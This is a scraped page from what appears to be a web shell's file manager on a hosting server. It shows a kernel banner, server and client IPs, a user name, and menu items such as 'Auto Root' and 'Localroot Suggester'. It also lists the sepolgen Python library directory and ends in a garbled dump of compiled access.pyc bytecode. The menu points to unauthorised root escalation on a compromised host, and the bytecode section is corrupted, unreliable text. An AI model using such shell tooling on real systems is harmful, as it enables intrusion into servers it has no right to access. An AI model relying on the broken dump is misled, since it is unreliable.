Linux yavrix.internet-webhosting.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
LiteSpeed
Server IP : 103.8.25.136 & Your IP : 216.73.216.149
Domains :
Cant Read [ /etc/named.conf ]
User : klinikpe
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
lib64 /
python2.7 /
site-packages /
sepolgen /
Delete
Unzip
Name
Size
Permission
Date
Action
__init__.py
0
B
-rw-r--r--
2020-04-01 04:04
__init__.pyc
142
B
-rw-r--r--
2020-04-01 04:04
__init__.pyo
142
B
-rw-r--r--
2020-04-01 04:04
access.py
12.33
KB
-rw-r--r--
2020-04-01 04:04
access.pyc
13.18
KB
-rw-r--r--
2020-04-01 04:04
access.pyo
13.18
KB
-rw-r--r--
2020-04-01 04:04
audit.py
23.64
KB
-rw-r--r--
2020-04-01 04:04
audit.pyc
22.33
KB
-rw-r--r--
2020-04-01 04:04
audit.pyo
22.33
KB
-rw-r--r--
2020-04-01 04:04
classperms.py
2.75
KB
-rw-r--r--
2020-04-01 04:04
classperms.pyc
3.16
KB
-rw-r--r--
2020-04-01 04:04
classperms.pyo
3.16
KB
-rw-r--r--
2020-04-01 04:04
defaults.py
2.69
KB
-rw-r--r--
2020-04-01 04:04
defaults.pyc
2.87
KB
-rw-r--r--
2020-04-01 04:04
defaults.pyo
2.87
KB
-rw-r--r--
2020-04-01 04:04
interfaces.py
16.21
KB
-rw-r--r--
2020-04-01 04:04
interfaces.pyc
15.86
KB
-rw-r--r--
2020-04-01 04:04
interfaces.pyo
15.86
KB
-rw-r--r--
2020-04-01 04:04
lex.py
32.86
KB
-rw-r--r--
2020-04-01 04:04
lex.pyc
19.24
KB
-rw-r--r--
2020-04-01 04:04
lex.pyo
19.24
KB
-rw-r--r--
2020-04-01 04:04
matching.py
8.45
KB
-rw-r--r--
2020-04-01 04:04
matching.pyc
7.4
KB
-rw-r--r--
2020-04-01 04:04
matching.pyo
7.4
KB
-rw-r--r--
2020-04-01 04:04
module.py
7.12
KB
-rw-r--r--
2020-04-01 04:04
module.pyc
8.4
KB
-rw-r--r--
2020-04-01 04:04
module.pyo
8.4
KB
-rw-r--r--
2020-04-01 04:04
objectmodel.py
6.37
KB
-rw-r--r--
2020-04-01 04:04
objectmodel.pyc
4.64
KB
-rw-r--r--
2020-04-01 04:04
objectmodel.pyo
4.64
KB
-rw-r--r--
2020-04-01 04:04
output.py
5.01
KB
-rw-r--r--
2020-04-01 04:04
output.pyc
4.51
KB
-rw-r--r--
2020-04-01 04:04
output.pyo
4.51
KB
-rw-r--r--
2020-04-01 04:04
policygen.py
16.31
KB
-rw-r--r--
2020-04-01 04:04
policygen.pyc
15.25
KB
-rw-r--r--
2020-04-01 04:04
policygen.pyo
15.18
KB
-rw-r--r--
2020-04-01 04:04
refparser.py
30.2
KB
-rw-r--r--
2020-04-01 04:04
refparser.pyc
36.27
KB
-rw-r--r--
2020-04-01 04:04
refparser.pyo
36.27
KB
-rw-r--r--
2020-04-01 04:04
refpolicy.py
27.31
KB
-rw-r--r--
2020-04-01 04:04
refpolicy.pyc
46.45
KB
-rw-r--r--
2020-04-01 04:04
refpolicy.pyo
46.45
KB
-rw-r--r--
2020-04-01 04:04
sepolgeni18n.py
912
B
-rw-r--r--
2020-04-01 04:04
sepolgeni18n.pyc
410
B
-rw-r--r--
2020-04-01 04:04
sepolgeni18n.pyo
410
B
-rw-r--r--
2020-04-01 04:04
util.py
5.41
KB
-rw-r--r--
2020-04-01 04:04
util.pyc
7.87
KB
-rw-r--r--
2020-04-01 04:04
util.pyo
7.87
KB
-rw-r--r--
2020-04-01 04:04
yacc.py
80.04
KB
-rw-r--r--
2020-04-01 04:04
yacc.pyc
41.4
KB
-rw-r--r--
2020-04-01 04:04
yacc.pyo
41.4
KB
-rw-r--r--
2020-04-01 04:04
Save
Rename
� ��^c @ s� d Z d d l m Z d d l m Z d d l m Z d � Z d e j f d � � YZ d � Z d d d � � YZ d � Z d � Z d d d � � YZ d S( sV Classes representing basic access. SELinux - at the most basic level - represents access as the 4-tuple subject (type or context), target (type or context), object class, permission. The policy language elaborates this basic access to faciliate more concise rules (e.g., allow rules can have multiple source or target types - see refpolicy for more information). This module has objects for representing the most basic access (AccessVector) and sets of that access (AccessVectorSet). These objects are used in Madison in a variety of ways, but they are the fundamental representation of access. i ( t refpolicy( t utili����( t audit2whyc C sU t | � d k rM | d d k rM y t | d � Wn t k rH t SXt St Sd S( s� Determine if an id is a paramater in the form $N, where N is an integer. Returns: True if the id is a paramater False if the id is not a paramater i i t $N( t lent intt ValueErrort Falset True( t id( ( s5 /usr/lib64/python2.7/site-packages/sepolgen/access.pyt is_idparam'